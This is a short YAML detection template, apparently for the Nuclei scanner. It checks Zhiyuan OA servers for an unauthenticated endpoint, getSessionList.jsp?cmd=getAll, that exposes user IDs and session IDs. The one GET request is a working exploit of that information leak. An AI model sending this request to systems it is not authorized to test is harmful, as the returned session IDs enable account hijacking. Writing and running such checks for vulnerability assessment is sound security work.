id: zhiyuan-oa-session-leak

info:
  name: Zhiyuan OA Session Leak
  author: pikpikcu
  severity: medium
  description: A vulnerability in Zhiyuan OA allows remote unauthenticated users access to sensitive session information via the 'getSessionList.jsp' endpoint.
  reference:
    - https://www.zhihuifly.com/t/topic/3345
  tags: zhiyuan,leak,disclosure

requests:
  - method: GET
    path:
      - "{{BaseURL}}/yyoa/ext/https/getSessionList.jsp?cmd=getAll"

    matchers-condition: and
    matchers:

      - type: word
        words:
          - "<usrID>"
          - "<sessionID>"
        condition: and

      - type: status
        status:
          - 200